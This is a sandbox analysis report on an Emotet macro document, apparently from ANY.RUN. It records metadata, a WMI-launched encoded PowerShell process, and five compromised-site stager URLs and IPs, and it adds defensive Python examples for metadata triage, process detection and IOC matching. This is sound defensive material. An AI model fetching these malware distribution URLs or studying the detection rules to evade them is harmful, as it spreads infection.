File name: File 38128 916659818.doc
Full analysis: https://app.any.run/tasks/2d37f047-f2bf-4183-9d7c-154688766a2e
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created; over its lifetime it was repeatedly upgraded into a highly destructive piece of malware. It mostly targets corporate victims, but private users are infected as well through mass spam email campaigns.

Analysis date: May 24, 2019, 20:02:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, opendir, emotet-doc, emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Intelligent, Subject: South Dakota, Author: Carol Carroll, Comments: COM Sao Tome and Principe, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 20:43:00 2019, Last Saved Time/Date: Fri May 24 20:43:00 2019, Number of Pages: 1, Number of Words: 16, Number of Characters: 94, Security: 0
MD5: CADA57979FA3C839C18ED2E219C9A745
SHA1: 6986C7C1CF4A65FD98AA016CD1487920A7B4342A
SHA256: 75ABC222B82B46458EA2BBC132CFD46D43473559B20195E2CDD0EE3D044A04A6
SSDEEP: 3072:477HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qLBHaRxO8hT5:477HUUUUUUUUUUUUUUUUUUUT52VgBHaZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report may have been affected by analyst interaction during the run and is provided as is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS: no malicious indicators.
  • SUSPICIOUS
    • Creates files in the user directory: powershell.exe (PID: 1484)
    • PowerShell script executed: powershell.exe (PID: 1484)
    • Executed via WMI: powershell.exe (PID: 1484)
  • INFO
    • Creates files in the user directory: WINWORD.EXE (PID: 1684)
    • Reads Microsoft Office registry keys: WINWORD.EXE (PID: 1684)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Intelligent
Subject: South Dakota
Author: Carol Carroll
Keywords: -
Comments: COM Sao Tome and Principe
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:24 19:43:00
ModifyDate: 2019:05:24 19:43:00
Pages: 1
Words: 16
Characters: 94
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Runolfsdottir Inc
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 109
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs: Title, 1
Manager: McCullough
No data.
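The EXIF block above is what the "generated-doc" tag is built on: a single revision, no recorded edit time, identical create and save times, an author but no "last modified by", and 16 words of visible text in a one-page document. The following is an added example, not part of the ANY.RUN report and not the logic behind its tag: it transcribes the report's properties into a dictionary, places a constructed "normally edited" document next to it, and scores both with heuristics that are this example's own.

```python
"""Score Office document properties for signs of bulk generation.

Added example, not part of the ANY.RUN report. REPORT_METADATA is transcribed
from the EXIF section of the report; NORMAL_METADATA is a constructed
counter-example. The indicators and the threshold are this example's own
heuristics, not the logic behind the report's "generated-doc" tag.
"""
from datetime import datetime

# Transcribed from the report (exiftool field names and values as shown there)
REPORT_METADATA = {
    "Author": "Carol Carroll",
    "LastModifiedBy": None,
    "RevisionNumber": 1,
    "TotalEditTime": None,
    "CreateDate": "2019:05:24 19:43:00",
    "ModifyDate": "2019:05:24 19:43:00",
    "Pages": 1,
    "Words": 16,
}

# Constructed: what a document edited over several sessions typically carries
NORMAL_METADATA = {
    "Author": "J. Smith",
    "LastModifiedBy": "J. Smith",
    "RevisionNumber": 27,
    "TotalEditTime": "5.2 hours",
    "CreateDate": "2019:01:10 09:12:00",
    "ModifyDate": "2019:03:02 14:30:00",
    "Pages": 14,
    "Words": 4120,
}


def parse_exif_date(value):
    # exiftool renders OLE SummaryInformation timestamps as YYYY:MM:DD HH:MM:SS
    return datetime.strptime(value, "%Y:%m:%d %H:%M:%S")


def generator_indicators(meta):
    """Return the names of the indicators present in a property set."""
    hits = []
    if parse_exif_date(meta["CreateDate"]) == parse_exif_date(meta["ModifyDate"]):
        hits.append("created_and_saved_same_second")  # written once, never reopened
    if meta.get("RevisionNumber") == 1:
        hits.append("single_revision")
    if not meta.get("TotalEditTime"):
        hits.append("no_edit_time")  # Word records minutes spent editing; a generated file has none
    if meta.get("Author") and not meta.get("LastModifiedBy"):
        hits.append("author_without_last_saved_by")  # Word fills LastModifiedBy on every save
    if meta.get("Words", 0) < 50:
        hits.append("tiny_visible_text")  # the lure is usually an image plus a macro, not prose
    return hits


def looks_generated(meta, threshold=3):
    """Triage verdict: three or more indicators is enough to pull the file for macro analysis."""
    return len(generator_indicators(meta)) >= threshold


if __name__ == "__main__":
    for name, meta in (("report sample", REPORT_METADATA), ("constructed normal doc", NORMAL_METADATA)):
        print(name, generator_indicators(meta), "generated" if looks_generated(meta) else "ordinary")
```

This is a triage score, not a verdict: a document instantiated from a template and saved once also shows a single revision with equal timestamps, and a legitimate form letter can have very few words. The value is in combining it with the "macros-on-open" tag, which is what actually decides whether the file is worth detonating.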
All screenshots are available in the full report
Total processes: 35
Monitored processes: 2
Malicious processes: 0
Suspicious processes: 1

Behavior graph (interactive in the full report): winword.exe (PID 1684, no specific indicators) → powershell.exe (PID 1484, started via WMI, so its recorded parent is wmiprvse.exe rather than WINWORD.EXE)

Process information

PID 1684: WINWORD.EXE
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\File 38128 916659818.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 1484: powershell.exe
  CMD: powershell -nop -e … (the encoded command is not reproduced in this export)
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: wmiprvse.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)
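The process table is the detection-relevant part of this report: the macro does not spawn PowerShell itself but goes through WMI, so powershell.exe appears under wmiprvse.exe with no Office ancestor, and the command line is `-nop -e` plus a base64 blob. A parent-child rule keyed on WINWORD.EXE misses this. The following is an added example, not part of the ANY.RUN report: it runs over a constructed list of process-creation events that mirror the table (PIDs, images and parents as shown there; the real encoded payload is not on the page, so a harmless placeholder is encoded in its place), flags PowerShell launched by wmiprvse.exe, decodes any `-EncodedCommand` argument, and raises the severity when an Office process started shortly before. The event field names are this example's own, not a particular log format.

```python
"""Flag PowerShell launched through WMI with an encoded command.

Added example, not part of the ANY.RUN report. The event list is constructed
to mirror the report's process table (WINWORD.EXE PID 1684 under explorer.exe,
powershell.exe PID 1484 under wmiprvse.exe); the report does not reproduce the
real -e payload, so a harmless placeholder is encoded here instead. Field names
(pid, image, parent_image, cmdline, time) are this example's own.
"""
import base64
import shlex

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}

PLACEHOLDER = "Write-Output 'harmless placeholder'"
# powershell.exe -e expects base64 of UTF-16LE text
ENCODED_PLACEHOLDER = base64.b64encode(PLACEHOLDER.encode("utf-16le")).decode("ascii")

# Constructed events; "time" is seconds since the start of the recording.
SAMPLE_EVENTS = [
    {"pid": 1684, "time": 0, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\File 38128 916659818.doc"'},
    {"pid": 3020, "time": 3, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 1484, "time": 8, "parent_image": r"C:\Windows\System32\wbem\wmiprvse.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -nop -e {ENCODED_PLACEHOLDER}"},
    {"pid": 4100, "time": 500, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},  # interactive console opened by the user, benign
    {"pid": 2212, "time": 900, "parent_image": r"C:\Windows\System32\wbem\wmiprvse.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\scripts\inventory.ps1"'},  # WMI-driven admin script
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def matches_switch(token, full, minimum):
    """powershell.exe accepts any prefix of a switch that is at least `minimum` long."""
    t = token.lstrip("-/").lower()
    return len(t) >= len(minimum) and full.startswith(t)


def is_encoded_flag(token):
    # -e, -en, -enc, ... -encodedcommand, plus the -ec alias
    return matches_switch(token, "encodedcommand", "e") or token.lstrip("-/").lower() == "ec"


def decode_encoded_command(b64):
    """Decode a -EncodedCommand argument; None if it is not valid base64 UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events, office_window=60):
    """Return one alert per suspicious powershell.exe start."""
    office_starts = [e["time"] for e in events if basename(e["image"]) in OFFICE_IMAGES]
    alerts = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        reasons, decoded = [], None
        tokens = shlex.split(e["cmdline"], posix=False)  # Windows quoting, no backslash escapes
        for i, tok in enumerate(tokens):
            if is_encoded_flag(tok) and i + 1 < len(tokens):
                reasons.append("encoded_command")
                decoded = decode_encoded_command(tokens[i + 1])
            elif matches_switch(tok, "noprofile", "nop"):
                reasons.append("no_profile")
        if basename(e["parent_image"]) == "wmiprvse.exe":
            reasons.append("spawned_by_wmiprvse")
            # WMI breaks the parent chain, so correlate on time instead of ancestry
            if any(0 <= e["time"] - t <= office_window for t in office_starts):
                reasons.append("office_started_shortly_before")
        if "spawned_by_wmiprvse" in reasons and (
                "encoded_command" in reasons or "office_started_shortly_before" in reasons):
            severity = "high"
        elif "spawned_by_wmiprvse" in reasons or "encoded_command" in reasons:
            severity = "medium"
        else:
            continue
        alerts.append({"pid": e["pid"], "severity": severity, "reasons": reasons, "decoded": decoded})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two caveats a practitioner will hit immediately. PowerShell launched from wmiprvse.exe is also how SCCM, monitoring agents and remote administration tools run scripts, which is why the rule only goes to "high" when the command is encoded or an Office process started moments earlier; and `-e` accepts any unambiguous prefix of `-EncodedCommand`, so matching the literal string `-EncodedCommand` in a log search misses the `-e`, `-en` and `-enc` forms.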
Total events: 1 593
Read events: 1 124
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 11

Dropped files

1684  WINWORD.EXE     C:\Users\admin\AppData\Local\Temp\CVREE16.tmp.cvr
      Type: –   MD5: –   SHA256: –
1484  powershell.exe  C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZJ08R3B5H0R6EDDQDPY.temp
      Type: –   MD5: –   SHA256: –
1684  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D881A2A.wmf
      Type: wmf   MD5: 3E356A7AF25F0EBA0ABCD97B45CD0E0E   SHA256: C649828E6C2949B283BE405DBBB72D5D45903E62EF274848FD288A4ACBB38F69
1684  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\449A398D.wmf
      Type: wmf   MD5: E1289578501661DCB11981206602BC5F   SHA256: 8D01395AEDB4EE8380F43E5FEBB9BC0C028B4668A838CC6676D2340ADA8520EC
1684  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8701023.wmf
      Type: wmf   MD5: 3C8E7191BC319CDB0C3922DDA4E1469F   SHA256: 6ACC236788D993BA782EAF2F2D5B4C800E0CB8B7FD69EB0C123B0B3AEE7750D9
1684  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\File 38128 916659818.doc.LNK
      Type: lnk   MD5: 632D6317C61646E9911056A8263C9849   SHA256: 6076D8671585A8EE1A792D77A304E2CB31045128BC33EAB2563E1A78E50636D3
1684  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      Type: pgc   MD5: 17222E7BED955763CB75EBDA153E0074   SHA256: EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882
1684  WINWORD.EXE     C:\Users\admin\Downloads\~$le 38128 916659818.doc
      Type: pgc   MD5: 4CEB43E2D3E008E847AC709B368C9681   SHA256: DE6AD5D48B60C13C529884649B367392B25129612A198D8438B0551980959A90
1684  WINWORD.EXE     C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Type: text   MD5: 793690AF4D980E6ADE41A519AB39B661   SHA256: C798B4B4E480B67CD4B783919AB2FE4B7C625C47564544FF5B07C751709D0AA1
1684  WINWORD.EXE     C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10F668BC.wmf
      Type: wmf   MD5: 79B5E2D696BF83EE1F1F7ADA3AD0F269   SHA256: 6578089CC597DD0DA0074AF5C54CF0649D7447A6F7A6EF9141E3EFFB1CCFF137
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 5
DNS requests: 6
Threats: 0

HTTP requests (all by powershell.exe, PID 1484)

Method  Code  IP:port              URL                                                                     CN  Type  Size   Reputation
GET     404   13.124.222.135:80    http://www.shang-ding.com.tw/phpmyadmin/ze24yvvom_tkdpml34w-56049/     KR  xml   345 b  unknown
GET     404   104.31.87.57:80      http://www.czabk.com/wp-admin/EdQdoGnbBz/                               US  xml   345 b  suspicious
GET     404   143.95.233.86:80     http://www.ri-magazine.com/ri/usod7inlc3_a8bolt-35/                     US  xml   345 b  suspicious
GET     404   31.186.8.88:80       http://adacan.net/cgi-bin/ArQlYWTG/                                     TR  xml   345 b  suspicious
GET     404   175.176.161.147:80   http://www.tafa.pxlcorp.com/wp-includes/xEVKeyGS/                       ID  xml   345 b  malicious

Connections

PID   Process         IP:port              Domain                   ASN                                                     CN  Reputation
1484  powershell.exe  143.95.233.86:80     www.ri-magazine.com      Colo4, LLC                                              US  suspicious
1484  powershell.exe  31.186.8.88:80       adacan.net               SAGLAYICI Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti.  TR  suspicious
1484  powershell.exe  13.124.222.135:80    www.shang-ding.com.tw    Amazon.com, Inc.                                        KR  unknown
1484  powershell.exe  104.31.87.57:80      www.czabk.com            Cloudflare Inc                                          US  shared
–     –               175.176.161.147:80   www.tafa.pxlcorp.com     Varnion Technology Semesta, PT                          ID  suspicious

DNS requests

Domain                   IP                            Reputation
adacan.net               31.186.8.88                   suspicious
www.czabk.com            104.31.87.57, 104.31.86.57    suspicious
www.ri-magazine.com      143.95.233.86                 suspicious
www.shang-ding.com.tw    13.124.222.135                unknown
www.tafa.pxlcorp.com     175.176.161.147               malicious
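The network section explains why the run ends with zero malicious processes: the PowerShell stager walked five hard-coded URLs on compromised sites (paths under wp-admin, wp-includes, cgi-bin, phpmyadmin or a short site directory, each followed by a random token and a trailing slash) and every one answered 404 with the same 345-byte error body, so no second stage was ever downloaded. What the report leaves you with is indicators, and the following is an added example, not part of the ANY.RUN report, of turning them into something a SOC can run: it copies the five URLs and IPs from the HTTP table above into indicator sets, then scans constructed proxy log lines (a simple space-separated format made up for this example, not any vendor's) for exact URL, host and IP matches, plus a weak path-shape tag. The path-shape regex is this example's own assumption about what these stager URLs looked like, not something the report states.

```python
"""Turn the HTTP table in this report into indicators and run them over proxy logs.

Added example, not part of the ANY.RUN report. The five URLs, IPs and HTTP
codes are copied from the report's HTTP requests table; the proxy log lines are
constructed (a simple space-separated format, not any vendor's), and the
path-shape heuristic is this example's own assumption, not the report's.
"""
import re
from urllib.parse import urlsplit

# Copied from the report's HTTP requests table (every request returned 404, 345 b)
REPORT_REQUESTS = [
    ("13.124.222.135", "http://www.shang-ding.com.tw/phpmyadmin/ze24yvvom_tkdpml34w-56049/", 404),
    ("104.31.87.57", "http://www.czabk.com/wp-admin/EdQdoGnbBz/", 404),
    ("143.95.233.86", "http://www.ri-magazine.com/ri/usod7inlc3_a8bolt-35/", 404),
    ("31.186.8.88", "http://adacan.net/cgi-bin/ArQlYWTG/", 404),
    ("175.176.161.147", "http://www.tafa.pxlcorp.com/wp-includes/xEVKeyGS/", 404),
]

# Weak heuristic (assumption): one short directory, one random token, trailing slash.
# In the report the directory is wp-admin, wp-includes, cgi-bin, phpmyadmin or a site dir.
STAGER_PATH = re.compile(r"^/[A-Za-z0-9_-]{1,12}/[A-Za-z0-9_-]{6,40}/$")

# Constructed proxy log format: timestamp client method url status bytes
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) (\d+)$")

SAMPLE_PROXY_LOG = [
    "2019-05-24T20:03:11Z 10.0.0.25 GET http://www.czabk.com/wp-admin/EdQdoGnbBz/ 404 345",
    "2019-05-24T20:03:12Z 10.0.0.25 GET http://adacan.net/ 200 5120",
    "2019-05-24T20:05:40Z 10.0.0.31 GET http://www.example.com/news/ 200 8891",
    "2019-05-24T20:06:02Z 10.0.0.40 GET http://shop.example.net/wp-content/aQz83Klw0P/ 404 345",
    "2019-05-24T20:07:15Z 10.0.0.25 GET http://175.176.161.147/wp-includes/xEVKeyGS/ 404 345",
]


def build_iocs(requests):
    """Split the report's requests into exact-URL, hostname and IP indicator sets."""
    iocs = {"urls": set(), "hosts": set(), "ips": set()}
    for ip, url, _status in requests:
        parts = urlsplit(url)
        iocs["urls"].add(parts.hostname + parts.path)  # scheme dropped: compromised sites may serve either
        iocs["hosts"].add(parts.hostname)
        iocs["ips"].add(ip)
    return iocs


def match_line(line, iocs):
    """Return a record with the indicator types that matched, or None for an unparsable line."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    _ts, client, _method, url, status, _size = m.groups()
    parts = urlsplit(url)
    host = parts.hostname or ""
    hits = []
    if host + parts.path in iocs["urls"]:
        hits.append("url")          # the exact stager URL from the report
    elif host in iocs["hosts"]:
        hits.append("host")         # same compromised site, different path
    if host in iocs["ips"]:
        hits.append("ip")           # client went straight to the IP literal
    if STAGER_PATH.match(parts.path):
        hits.append("path_shape")   # weak; only meaningful alongside another hit or a 404 storm
    return {"client": client, "url": url, "status": int(status), "hits": hits}


def scan(lines, iocs):
    """All log records that matched at least one indicator, in log order."""
    return [r for r in (match_line(line, iocs) for line in lines) if r and r["hits"]]


if __name__ == "__main__":
    for record in scan(SAMPLE_PROXY_LOG, build_iocs(REPORT_REQUESTS)):
        print(record)
```

Reputation in the report differs per view (www.tafa.pxlcorp.com is "malicious" in the HTTP and DNS tables but "suspicious" under Connections), which is a reminder that the exact URL and the IP observed at analysis time are the durable indicators; the hosts are compromised legitimate sites and will be cleaned or rotated, so a host-only match on its own deserves a look rather than a block.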

Threats: no threats detected

No debug info